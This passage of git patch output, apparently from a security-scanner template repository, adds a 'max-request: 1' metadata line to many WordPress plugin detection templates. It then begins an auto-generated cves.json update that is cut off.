     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From fcc26782cb5bed92e142217fc0dd1070a3f5848c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 14:33:23 +0000
Subject: [PATCH 0407/1090] Auto Generated cves.json [Sun Sep 17 14:33:23 UTC
 2023] :robot:

---
 cves.json              | 5 +++++
 cves.json-checksum.txt | 2 +-
 2 files changed, 6 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index ca0404347b..482ba4ba06 100644
--- a/cves.json
+++ b/cves.json
@@ -1888,6 +1888,7 @@
